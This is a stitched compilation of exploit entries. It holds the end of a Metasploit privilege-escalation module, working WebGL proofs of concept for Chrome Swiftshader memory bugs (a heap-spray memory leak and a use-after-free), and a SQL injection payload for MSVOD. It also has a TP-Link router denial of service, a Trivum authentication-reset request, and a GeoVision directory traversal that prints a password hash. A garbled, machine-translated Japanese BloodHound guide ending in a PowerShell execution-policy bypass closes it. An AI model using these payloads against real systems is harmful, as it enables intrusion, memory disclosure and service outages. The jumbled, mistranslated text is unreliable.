vprint_status 'Dropping pre-compiled exploit on system...'
upload_and_chmodx executable_path, exploit_data('exploit.out')
end
# Upload payload executable
payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
upload_and_chmodx payload_path, generate_payload_exe
# Launch exploit
print_status 'Launching exploit ...'
output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path} "
output.each_line { |line| vprint_status line.chomp }
print_status "Cleaning up #{payload_path} and #{executable_path} ..."
rm_f executable_path
rm_f payload_path
end
end
<!--
There is a bug in the Swiftshader renderer handling blitting between surfaces (Renderer/Blitter.cpp).
For simplicity's sake, we'll consider the case when JITting fails (so ignoring the call to blitReactor) - in practice, the JITted code has the same problem, but it's somewhat more difficult to understand/explain that code.
void Blitter::blit(Surface *source, const SliceRectF &sourceRect, Surface *dest, const SliceRect &destRect, const Blitter::Options& options)
{
if(dest->getInternalFormat() == FORMAT_NULL)
{
return;
}
if(blitReactor(source, sourceRect, dest, destRect, options))
{
return;
}
SliceRectF sRect = sourceRect;
SliceRect dRect = destRect;
bool flipX = destRect.x0 > destRect.x1;
bool flipY = destRect.y0 > destRect.y1;
if(flipX)
{
swap(dRect.x0, dRect.x1);
swap(sRect.x0, sRect.x1);
}
if(flipY)
{
swap(dRect.y0, dRect.y1);
swap(sRect.y0, sRect.y1);
}
source->lockInternal((int)sRect.x0, (int)sRect.y0, sRect.slice, sw::LOCK_READONLY, sw::PUBLIC);
dest->lockInternal(dRect.x0, dRect.y0, dRect.slice, sw::LOCK_WRITEONLY, sw::PUBLIC);
float w = sRect.width() / dRect.width();
float h = sRect.height() / dRect.height();
const float xStart = sRect.x0 + 0.5f * w;
float y = sRect.y0 + 0.5f * h;
float x = xStart;
for(int j = dRect.y0; j < dRect.y1; j++)
{
x = xStart;
for(int i = dRect.x0; i < dRect.x1; i++)
{
// FIXME: Support RGBA mask
dest->copyInternal(source, i, j, x, y, options.filter);
x += w;
}
y += h;
}
source->unlockInternal();
dest->unlockInternal();
}
For context, dest->copyInternal will simply cast x and y to type int, and use them to read the colour at (x, y) from the source surface, then write it to (i, j) in the destination surface. No further bounds checking is performed in this function, since the inputs to it should previously have been checked.
In every calling path, we should have also previously checked that sourceRect and destRect are within the bounds oftheir respective surfaces, so all of these accesses should be safe.
If we look at the method of calculation for w and x however, we can see a potential problem.
float w = sRect.width() / dRect.width();
...
for(int j = dRect.y0; j < dRect.y1; j++)
{
x = xStart;
for(int i = dRect.x0; i < dRect.x1; i++)
{
...
x += w;
}
...
We're performing repeated additions of floating point values, and in this case the attacker has sufficient control over the input values to arrange matters so that this has interesting results. The example used in the PoC is when the source width is 5828, and the destination width is 8132. Below shows the results of the calculation performed in the code, and a second calculation where a multiplication is used instead of the iterative addition:
0: 1.075012 1.075012
1: 1.791687 1.791687
...
1000: 717.749878 717.749878 Up to here the precision used the values are still identical
1001: 718.466553 718.466553
...
2046: 1467.391724 1467.391724 At this point, the first significant errors start to occur, but note
2047: 1468.108398 1468.108521 that the "incorrect" result is smaller than the more precise one.
...
2856: 2047.898315 2047.898438
2857: 2048.614990 2048.614990 Here our two computations coincide again, briefly, and from here onwards
2858: 2049.331787 2049.331787 the precision errors consistently favour a larger result than the more
2859: 2050.048584 2050.048340 precise calculation.
...
8129: 5827.567871 5826.924805
8130: 5828.284668 5827.641602
8131: 5829.001465 5828.358398 The last index is now sufficiently different that int conversion results in an oob index.
The result here is that we end up taking our sample values for the last row of the result from one-row-past-the-end of the source buffer.
If we build with ASAN and disable the JIT by commenting out the blitReactor call, we can see this from the ASAN report:
=================================================================
==26029==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f808f3c205c at pc 0x7f809fdfcd34 bp 0x7fff0b816250 sp 0x7fff0b816248
READ of size 4 at 0x7f808f3c205c thread T0 (chrome)
==26029==WARNING: invalid path to external symbolizer!
==26029==WARNING: Failed to use and restart external symbolizer!
#0 0x7f809fdfcd33 in sw::Surface::Buffer::read(void*) const /ssd/chrome/src/out/asan/../../third_party/swiftshader/src/Renderer/Surface.cpp:580:25
#1 0x7f809fdc088a in sw::Blitter::blit(sw::Surface*, sw::SliceRectT<float> const&, sw::Surface*, sw::SliceRectT<int> const&, sw::Blitter::Options const&) /ssd/chrome/src/out/asan/../../third_party/swiftshader/src/Renderer/Blitter.cpp:187:11
0x7f808f3c205c is located 0 bytes to the right of 135862364-byte region [0x7f8087230800,0x7f808f3c205c)
allocated by thread T0 (chrome) here:
#0 0x55f41d3e45c2 in operator new[](unsigned long) _asan_rtl_:3
#1 0x7f809ff6b82a in allocateRaw /ssd/chrome/src/out/asan/../../third_party/swiftshader/src/Common/Memory.cpp:68:25
#2 0x7f809ff6b82a in sw::allocate(unsigned long, unsigned long) /ssd/chrome/src/out/asan/../../third_party/swiftshader/src/Common/Memory.cpp:85:0
SUMMARY: AddressSanitizer: heap-buffer-overflow (/ssd/chrome/src/out/asan/swiftshader/libGLESv2.so+0x4ddd33)
Shadow bytes around the buggy address:
0x0ff091e703b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff091e703c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff091e703d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff091e703e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff091e703f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0ff091e70400: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
0x0ff091e70410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0ff091e70420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0ff091e70430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0ff091e70440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0ff091e70450: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==26029==ABORTING
The bug is however also present in the JIT version of the function, and the attached PoC when run on a normal chrome build (with --disable-gpu, or forcing swiftshader as per my previously reported issue) should output leaked memory from the gpu process to the console. The very rough heap-spray implemented makes it likely the leaked memory will contain pointers to the chrome binary, to libswiftshader, and to the heap.
-->
<html>
<head>
</head>
<body onload="start()">
<canvas id='gl' width='128' height='128' />
<script>
function hex(value, count) {
const alphabet = '0123456789abcdef';
var result = '';
for (var i = (count / 4) - 1; i >= 0; --i) {
result += alphabet[(value >> (i * 4)) & 0xf];
}
return result;
}
function interesting_line(view, i) {
for (var j = 0; j < 16; ++j) {
if (view.getUint8(i + j) != 0) {
return true;
}
}
return false;
}
function hexdump(view) {
output = '';
for (var i = 0; i < view.byteLength; i += 16) {
if (interesting_line(view, i)) {
output += hex(i, 16) + ': ';
ascii = '';
for (var j = 0; j < 16; ++j) {
if (i + j < view.byteLength) {
byte = view.getUint8(i + j);
output += hex(byte, 8) + ' ';
if (0x20 <= byte && byte <= 0x7e) {
ascii += String.fromCharCode(byte);
} else {
ascii += '.';
}
} else {
output += ' ';
}
}
output += ' ' + ascii + '\n';
}
}
return output;
}
function web(gl) {
const width = 8192;
const src_height = 5828;
const dst_height = 8132;
var src_fb = gl.createFramebuffer();
gl.bindFramebuffer(gl.READ_FRAMEBUFFER, src_fb);
src_fb.width = width;
src_fb.height = src_height;
var src_data = new Uint8Array(width * src_height * 16);
for (var i = 0; i < src_data.length; ++i) {
src_data[i] = 0x23;
}
src_tex = gl.createTexture();
gl.bindTexture(gl.TEXTURE_2D, src_tex);
gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA8, src_fb.width, src_fb.height, 0, gl.RGBA, gl.UNSIGNED_BYTE, src_data);
gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MIN_FILTER, gl.NEAREST);
gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MAG_FILTER, gl.NEAREST);
gl.framebufferTexture2D(gl.READ_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.TEXTURE_2D, src_tex, 0);
var dst_fb = gl.createFramebuffer();
gl.bindFramebuffer(gl.DRAW_FRAMEBUFFER, dst_fb);
dst_fb.width = width;
dst_fb.height = dst_height;
var dst_rb = gl.createRenderbuffer();
gl.bindRenderbuffer(gl.RENDERBUFFER, dst_rb);
gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA8, dst_fb.width, dst_fb.height);
gl.framebufferRenderbuffer(gl.DRAW_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.RENDERBUFFER, dst_rb);
spray_data = new Uint8Array(8 * 8 * 4);
for (var i = 0; i < 8 * 8; ++i) {
spray_data[i] = 0x41;
}
for (var i = 0; i < 1024; ++i) {
spray_tex = gl.createTexture();
gl.bindTexture(gl.TEXTURE_2D, spray_tex);
gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA8, 8, 8, 0, gl.RGBA, gl.UNSIGNED_BYTE, spray_data);
}
gl.blitFramebuffer(0, 0, width, src_height,
0, 0, width, dst_height,
gl.COLOR_BUFFER_BIT, gl.NEAREST);
gl.bindFramebuffer(gl.READ_FRAMEBUFFER, dst_fb);
var dst_data = new Uint8Array(width * 4);
gl.readPixels(0, dst_height - 1, width, 1, gl.RGBA, gl.UNSIGNED_BYTE, dst_data);
console.log(hexdump(new DataView(dst_data.buffer)));
}
function start() {
var canvas = document.getElementById('gl');
var gl = canvas.getContext('webgl2');
if (gl) {
web(gl);
}
}
</script>
</body>
</html>
# Exploit Title: MSVOD V10 ¡V SQL Injection
# Google Dork: inurl:"images/lists?cid=13"
# Date: 2018/07/17
# Exploit Author: Hzllaga
# Vendor Homepage: http://www.msvod.cc/
# Version: MSVOD V10
# CVE : CVE-2018-14418
#Reference : https://www.wtfsec.org/2583/msvod-v10-sql-injection/
Payload:
/images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20
<!--
There's an object lifetime issue in the Swiftshader OpenGL texture bindings (OpenGL/libGLESv2/Texture.cpp).
The same bug is present in all versions of TextureXX::copyImage, below is the simplest function:
void Texture2D::copyImage(GLint level, GLenum internalformat, GLint x, GLint y, GLsizei width, GLsizei height, Renderbuffer *source)
{
egl::Image *renderTarget = source->getRenderTarget();
if(!renderTarget)
{
ERR("Failed to retrieve the render target.");
return error(GL_OUT_OF_MEMORY);
}
if(image[level])
{
image[level]->release();
}
image[level] = egl::Image::create(this, width, height, internalformat);
if(!image[level])
{
return error(GL_OUT_OF_MEMORY);
}
if(width != 0 && height != 0)
{
sw::SliceRect sourceRect(x, y, x + width, y + height, 0);
sourceRect.clip(0, 0, renderTarget->getWidth(), renderTarget->getHeight());
copy(renderTarget, sourceRect, 0, 0, 0, image[level]);
}
renderTarget->release();
}
egl::Image objects are manually reference counted with a 32-bit reference count (see OpenGL/common/Object{.hpp,.cpp}), using addRef/release, and there is an error path here (when egl::Image::create fails) where the reference taken on renderTarget by source->getRenderTarget() is never dropped.
I haven't verified that this bug can be reached in stable - I'm looking at the code for the latest dev, and various changes have been made to the allocations of egl::Image in dev in the fixes to crbug.com/835299 - the attached PoC is tested against 68.0.3440.7, and for versions prior to the fixes I think a different strategy (or at least texture sizes) will be needed to cause the allocations to fail.
(In 68.0.3440.7, it's possible to create allocations such that the initial texture allocation succeeds, but that the size of the equivalent cube map texture will fail, since cube maps get an additional border pixel - this is the strategy used in the PoC).
Note also that the PoC is triggering the bug directly from javascript - this will take some time! Approximately an hour for me, significantly longer for an ASAN build. This would be much quicker with direct asynchronous access to the GPU command buffer interface, so with an additional renderer bug just using this bug just for sandbox escape.
[144553:144553:0604/113443.369302:ERROR:gpu_process_transport_factory.cc(1016)] Lost UI shared context.
[144553:144602:0604/113443.474027:ERROR:object_proxy.cc(616)] Failed to call method: org.freedesktop.Notifications.GetCapabilities: object_path= /org/freedeskt
[144610:144610:0604/113445.417389:ERROR:gles2_cmd_decoder.cc(14816)] [.Offscreen-For-WebGL-0x1b0d726ad000]GL ERROR :GL_OUT_OF_MEMORY : glCopyTexImage2D:
Received signal 11 SEGV_MAPERR ffffc58ecd269cf1
#0 0x55df80ab5d0c base::debug::StackTrace::StackTrace()
#1 0x55df80ab5871 base::debug::(anonymous namespace)::StackDumpSignalHandler()
#2 0x7f73116670c0 <unknown>
#3 0x7f73028d0638 <unknown>
#4 0x7f73028db9ed <unknown>
#5 0x7f73028dcfb4 <unknown>
#6 0x7f73028dfb96 <unknown>
#7 0x55df813cd2ae gl::GLApiBase::glCopyTexImage2DFn()
#8 0x55df818c6d7c gpu::gles2::GLES2DecoderImpl::DoCopyTexImage2D()
#9 0x55df8188f4e5 gpu::gles2::GLES2DecoderImpl::HandleCopyTexImage2D()
#10 0x55df818b31b7 gpu::gles2::GLES2DecoderImpl::DoCommandsImpl<>()
#11 0x55df81875f88 gpu::CommandBufferService::Flush()
#12 0x55df81c57465 gpu::CommandBufferStub::OnAsyncFlush()
#13 0x55df81c5729f _ZN3IPC8MessageTI35GpuCommandBufferMsg_AsyncFlush_MetaNSt3__15tupleIJijbEEEvE8DispatchIN3gpu17CommandBufferStubES8_vMS8_FvijbEEEbPKNS_7MessageEPT_PT0_PT1_T2_
#14 0x55df81c561cb gpu::CommandBufferStub::OnMessageReceived()
#15 0x55df81c54587 gpu::GpuChannel::HandleMessageHelper()
#16 0x55df81c52b25 gpu::GpuChannel::HandleMessage()
#17 0x55df81c5d950 gpu::Scheduler::RunNextTask()
#18 0x55df80a2c34c base::debug::TaskAnnotator::RunTask()
#19 0x55df80a44887 base::MessageLoop::RunTask()
#20 0x55df80a44d67 base::MessageLoop::DoWork()
#21 0x55df80a4775f base::(anonymous namespace)::WorkSourceDispatch()
#22 0x7f730f77df07 g_main_context_dispatch
#23 0x7f730f77e138 <unknown>
#24 0x7f730f77e1cc g_main_context_iteration
#25 0x55df80a47622 base::MessagePumpGlib::Run()
#26 0x55df80a642c5 base::RunLoop::Run()
#27 0x55df83d9b9de content::GpuMain()
#28 0x55df80771bc6 content::ContentMainRunnerImpl::Run()
#29 0x55df8077abb2 service_manager::Main()
#30 0x55df8076fc64 content::ContentMain()
#31 0x55df7ed481b3 ChromeMain
#32 0x7f730b8f92b1 __libc_start_main
#33 0x55df7ed4802a _start
r8: 0000000000000001 r9: 0000000000000000 r10: 0000000000000000 r11: 0000000000000010
r12: 0000000000000000 r13: 000000000001ffe0 r14: 0000000000000000 r15: 0000000000001440
di: 00003a739c2293c0 si: 0000000000000000 bp: 0000000000000000 bx: 00003a739c2293c0
dx: 0000000000000000 ax: ffffc58ecd269ce1 cx: 0000000000000000 sp: 00007ffe0e7af580
ip: 00007f73028d0638 efl: 0000000000010246 cgf: 002b000000000033 erf: 0000000000000005
trp: 000000000000000e msk: 0000000000000000 cr2: ffffc58ecd269cf1
[end of stack trace]
Calling _exit(1). Core file will not be generated.
=================================================================
==145933==ERROR: AddressSanitizer: heap-use-after-free on address 0x61100001d208 at pc 0x7f66d7569d00 bp 0x7ffcb4922af0 sp 0x7ffcb4922ae8
READ of size 8 at 0x61100001d208 thread T0 (chrome)
==145933==WARNING: invalid path to external symbolizer!
==145933==WARNING: Failed to use and restart external symbolizer!
#0 0x7f66d7569cff in es2::Colorbuffer::getRenderTarget() /ssd/chrome/src/out/asan/../../third_party/swiftshader/src/OpenGL/libGLESv2/Renderbuffer.cpp:538:18
#1 0x7f66d75806d1 in es2::CopyTexImage2D(unsigned int, int, unsigned int, int, int, int, int, int) /ssd/chrome/src/out/asan/../../third_party/swiftshader/src/OpenGL/libGLESv2/libGLESv2.cpp:1037:13
0x61100001d208 is located 200 bytes inside of 240-byte region [0x61100001d140,0x61100001d230)
freed by thread T0 (chrome) here:
#0 0x55ec7d63dbd2 in operator delete(void*) _asan_rtl_:3
#1 0x7f66d7578d35 in es2::TextureCubeMap::copyImage(unsigned int, int, unsigned int, int, int, int, int, es2::Renderbuffer*) /ssd/chrome/src/out/asan/../../third_party/swiftshader/src/OpenGL/libGLESv2/Texture.cpp:1285:16
#2 0x7f66d75806d1 in es2::CopyTexImage2D(unsigned int, int, unsigned int, int, int, int, int, int) /ssd/chrome/src/out/asan/../../third_party/swiftshader/src/OpenGL/libGLESv2/libGLESv2.cpp:1037:13
previously allocated by thread T0 (chrome) here:
#0 0x55ec7d63cf92 in operator new(unsigned long) _asan_rtl_:3
#1 0x7f66d718613d in egl::Image::create(int, int, int, int, bool) /ssd/chrome/src/out/asan/../../third_party/swiftshader/src/OpenGL/common/Image.cpp:1234:10
SUMMARY: AddressSanitizer: heap-use-after-free (/ssd/chrome/src/out/asan/swiftshader/libGLESv2.so+0x6d4cff)
Shadow bytes around the buggy address:
0x0c227fffb9f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fffba00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c227fffba10: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa
0x0c227fffba20: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c227fffba30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c227fffba40: fd[fd]fd fd fd fd fa fa fa fa fa fa fa fa fa fa
0x0c227fffba50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c227fffba60: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa
0x0c227fffba70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fffba80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fffba90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==145933==ABORTING
-->
<html>
<head>
</head>
<body onload="start()">
<canvas id='gl' width='128' height='128' />
<script>
function web(gl) {
const width = 8190;
const height = 8190;
var src_fb = gl.createFramebuffer();
gl.bindFramebuffer(gl.READ_FRAMEBUFFER, src_fb);
var src_rb = gl.createRenderbuffer();
gl.bindRenderbuffer(gl.RENDERBUFFER, src_rb);
gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA32UI, width, height);
gl.framebufferRenderbuffer(gl.READ_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.RENDERBUFFER, src_rb);
dst_tex = gl.createTexture();
gl.bindTexture(gl.TEXTURE_CUBE_MAP, dst_tex);
for (var i = 3; i < 0x100000000; ++i) {
gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, width, height, 0);
}
gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, 16, 16, 0);
gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, 16, 16, 0);
}
function start() {
var canvas = document.getElementById('gl');
var gl = canvas.getContext('webgl2');
if (gl) {
web(gl);
}
}
</script>
</body>
</html>
# Exploit Title:- TP-Link Wireless N Router WR840N - Buffer Overflow
# Date:- 2018-07-16
# Vendor Homepage:- https://www.tp-link.com/
# Hardware Link:- https://www.amazon.in/TP-LINK-TL-WR840N-300Mbps-Wireless-External/dp/B01A0G1J7Q
# Version:- TP-Link Wireless N Router WR840N
# Category:- Hardware
# Exploit Author:- Aniket Dinda
# Tested on:- Linux
# CVE:- CVE-2018-14336
**********************************************************************************************************
Proof Of Concept:-
1- First connect to this network
2- Open terminal => And Type "macof -i eth0 -n 10"
3- Hit Enter
4- You will see that your Net connection will lost.
******************************************************************************************************
Solutions:
1- You have to Reboot your router .
# Exploit Title: Touchpad / Trivum WebTouch Setup V9 V2.53 build 13163 - Unauthorized Authentication Reset
# Date: 2018-07-20
# Software Link: https://world.trivum-shop.de
# Version: < 2.56 build 13381 - 12-07-2018
# Category: webapps
# Tested on:
Touchpad / Trivum WebTouch Setup V9 V2.53 build 13163 of Apr 6 2018 09:10:14 (FW 303)
# Exploit Author: vulnc0d3
# Contact: http://twitter.com/HerwonoWr
# CVE: CVE-2018-13862
1. Description
Touchpad / Trivum WebTouch Setup V9 V2.53 build 13163 of Apr 6 2018 09:10:14 (FW 303) before 2.56 build 13381 - 12.07.2018, allow unauthorized remote attackers to reset the authentication via "/xml/system/setAttribute.xml" URL, using GET request to the end-point "?id=0&attr=protectAccess&newValue=0" (successful attack will allow attackers to login without authorization).
2. Proof of Concept
# GET Request
http://target/xml/system/setAttribute.xml?id=0&attr=protectAccess&newValue=0
3. Vendor Changes Log
# http://update.trivum.com/update/tp9-changes.html
# Exploit Title: GeoVision GV-SNVR0811 Directory Traversal
# Exploit Author: Berk Dusunur
# Google Dork: N/A
# Type: Hardware
# Date: 2018-07-21
# Vendor Homepage: http://www.geovision.com.tw/product/GV-SNVR0811
# Software Link: http://www.geovision.com.tw/product/GV-SNVR0811
# Affected Version: N/A
# Tested on: Parrot OS
# CVE : N/A
# Proof Of Concept
GET Request
GET ../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Response
HTTP/1.1 200 OK
Server:Cross Web Server
Content-length: 59
Content-type: application/octet-stream
root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh
0x00 概要
1。ブラッドハウンドの紹介
BLOODHOUNDは、Linkuriousに基づいて構築され、電子でコンパイルされた単一ページJavaScript Webアプリケーションです。 NEO4JデータベースはPowerShell/C#Ingestorです。
Bloodhoundは、視覚化を使用して、アクティブなディレクトリ環境に非表示および関連するホストコンテンツを表示します。攻撃者は、ブラッドハウンドを使用して非常に複雑な攻撃パスを簡単に識別できます。そうしないと、それらを迅速に識別することは困難です。ディフェンダーは、ブラッドハウンドを使用して、同じ攻撃パスを特定して防御することができます。青と赤の両方のチームは、BloodHoundを使用して、アクティブなディレクトリ環境での許可関係に関する洞察を簡単に得ることができます。
Bloodhoundは、 @_wald0、 @cptjesus、 @harmj0yが共同で開発しました。
2。初心者の基本
Bloodhoundを始めるのは非常に簡単です。完了したら、データ収集セクションに移動してデータの収集を開始するか、Bloodhoundを使用して含まれているデータベースを表示します。
(1).windows
このビデオは、neo4j:https://youtu.be/o22emeubrnkのセットアップのプロセスを示しています
Neo4JにはJava環境が必要なので、Javaの最新バージョンを実行していることを確認してください。
neo4j.com/downloadに移動して、[サーバーをダウンロード]をクリックします
Windows用のNeo4J Serverの現在のバージョンをダウンロードし、32ビットまたは64ビットを選択します。
ステップ4でダウンロードされたzipフォルダーの内容を解凍します。
管理者として実行されているCMD.exeを開き、ステップ4で解凍したフォルダーに移動します。
binディレクトリへのCDを実行してNEO4Jをサービスとしてインストールします:neo4j.batインストールサービス
Bloodhound Github Repoをダウンロード/クローンし、bloodhoundexampledb.graphdbをデータ\ databaseneo4jディレクトリの下のフォルダーにコピーします。
cmd.exeでは、ディレクトリとCDをconfディレクトリに返します。 neo4j.confを開き、ラインdbms.active_database=graph.dbを開きます。この行を変更して、dbms.active_database=bloodhoundsexampledb.graphdbとして表示されます。また、dbms.allow_upgrade=trueの行を除外して、dbms.allow_upgrade=trueとして表示され、ファイルを保存します。
cmd.exeを入力してEnter:neo4jnet neo4jを開始します
NEO4Jがブラウザでhttp://LocalHost:7474を開いて実行されていることを確認します。 NEO4J Webコンソールは正常に表示されるはずです。
ここからダウンロードしたバージョンからBloodHound.exeを実行するか、ソースからBloodhoundをコンパイルします。
bolt: //localhost:7687で提供されたサンプルグラフデータベースを認証します。ユーザー名は「NEO4J」で、パスワードは「BloodHound」です。
今すぐデータの収集を開始できます!
(2).linux
LinuxでBloodhoundのセットアップに関するより良い指示については、このブログ投稿を参照してください:https://Stealingthe.network/quick-guide-to-installing-bloodhound-in-cali-rolling/
NEO4Jコミュニティバージョンをダウンロードしてインストールします。
オプション:さまざまなホストでNEO4JおよびPowerShellレシーバープログラムを実行する予定がある場合は、リモート接続を受け入れるようにREST APIを構成します。
クローンBloodHoundGithub Repo
git clone 3https://github.com/adaptivethreat/bloodhound
NEO4Jサーバーを起動し、NEO4Jを指定されたサンプルグラフデータベースにポイントします。
ここにある対応するバージョンからBloodhoundを実行するか、ソースからBloodhoundをコンパイルします。
./Bloodhound
BOLT: //localhost:7687で提供されるグラフデータベースの例を介した認証。ユーザー名は「NEO4J」で、パスワードは「BloodHound」です
今すぐデータの収集を開始できます!
(3).kali
1.最新のシステムであることを確認し、次のコマンドを実行してシステムApt-Get updateapt-Get dist-upgrade2を更新します。 Bloodhoundのインストールは、次のコマンドを実行する必要があります。 BloodhoundはNeo4Jに依存するため、同様にインストールされます。 apt-getインストールBloodhound 
3。NEO4JのデフォルトパスワードNEO4Jコンソール
を変更します
4.現在、http://LocalHost:7474にリモートインターフェイスがあります。ブラウザを介してこのURLリンクアドレスを開き、デフォルトのパスワードを変更します。また、LocalHostでボルトが有効になっていることがわかります。これは後で使用されます。
5。デフォルトの資格情報(次のように)でログインすると、パスワードを変更するように求められます。
ユーザー名:NEO4Jパスワード:NEO4J 
パスワードの変更を完了し続け、ブラウザウィンドウを閉じた後。
6.新しい端子ウィンドウがポップアップして開き、次のコマンドを実行してBloodhoundを開始します。
Bloodhound 
ご覧のとおり、Bloodhoundは現在走っていて、ユーザーの入力を待っています。また、NEO4Jがリリースされる前に、Bolt: //127.0.0.1:7687でBoltを有効にしました。データベースURLとして使用する必要があります。
データベースURL -BOLT: //127.0.0.1:7687 USERNAME -NEO4Jパスワード - 新しく変更されたパスワードのログインをクリックすると、BloodHoundツールがデータを削除したことがわかります。これで、データをインポートして分析を実行できます。
(4).osx
NEO4Jコミュニティバージョンをダウンロードしてインストールします。
オプション:さまざまなホストでNEO4JおよびPowerShellレシーバープログラムを実行する予定がある場合は、リモート接続を受け入れるようにREST APIを構成します。
クローンBloodHoundGithub Repo
git clone 3https://github.com/adaptivethreat/bloodhound
NEO4Jサーバーを起動し、NEO4Jを指定されたサンプルグラフデータベースにポイントします。
ここから対応するバージョンを見つけて、Bloodhoundアプリケーションを実行するか、ソースコードからBloodhoundをコンパイルします。
BOLT: //localhost:7687で提供されるグラフデータベースの例を介した認証。ユーザー名は「NEO4J」で、パスワードは「BloodHound」です。データの収集を開始できます。
3。ソースコードコンパイルBloodhound
(1).windows
インストールnodejs
電子パッカーをインストールします
NPMインストール-G Electron -Packager
クローンブラッドハウンドGithubrepo
git clone 3https://github.com/adaptivethreat/bloodhound
ルートディレクトリブラッドハウンドから「NPMインストール」コマンドを実行します
NPMインストール
「NPM Run Winbuild」コマンドを使用してBloodHoundをコンパイルします
npm run winbuild
(2).linux
nodejsをインストールします
電子パッカーをインストールします
sudo npmインストール-g電子パッカー
クローンブラッドハウンドGithubrepo
git clone 3https://github.com/adaptivethreat/bloodhound
ルートディレクトリブラッドハウンドから「NPMインストール」コマンドを実行します
NPMインストール
「NPM Run Winbuild」コマンドを使用してBloodHoundをコンパイルします
npm rinuxbuild
(3).osx
nodejsをインストールします
電子パッカーをインストールします
sudo npmインストール-g電子パッカー
クローンブラッドハウンドGithubrepo
git clone 3https://github.com/adaptivethreat/bloodhound
ルートディレクトリブラッドハウンドから「NPMインストール」コマンドを実行します
sudo npmインストール
「NPM Run Winbuild」コマンドを使用してBloodHoundをコンパイルします
npm run macbuild
4。 Bloodhound
の開発バージョンを実行しますインストールnode.js
クローンブラッドハウンドGithubrepo
git clone 3https://github.com/adaptivethreat/bloodhound
ルートディレクトリブラッドハウンドから「NPMインストール」コマンドを実行します
NPMインストール
'npm run dev'コマンドを使用して開発バージョンサーバーを実行します
npm run dev
Ctrl + RでWebpackコンピレーションを完了したら、電子ウィンドウを更新します
0x02データ収集
1。はじめに
BLOODHOUNDには、実行するためにActive Directory環境から3つの情報が必要です。
誰がログインしていますか?誰が管理権限を持っていますか?どのユーザーとグループがどのグループに属しますか? (オプション)他のユーザーやグループオブジェクトを制御できるプリンシパルはどれですか?ほとんどの場合、この情報を収集しても、管理者の権利は必要ありません。また、リモートシステムでコード実行を必要としません。 PowerViewベースのPowerShell Ingesterは、データ収集を迅速かつ簡単にします。 Ingestor(Collector)は、Bloodhound Repoの下のIngestorディレクトリにあります。
コレクターは、より多くのパスを提供する多くの追加データと、使いやすいノードプロパティを収集します。
(1).powershell実行戦略
デフォルトでは、PowerShellはPowerShellスクリプトの実行を許可していません。ただし、ほとんどの場合、この制限をバイパスすることは非常に簡単です。通常、次のコマンドを実行することにより、制限されずにコマンドを実行するためにPowerShellを入力できます。
PS C: \ PowerShell -Execバイパス
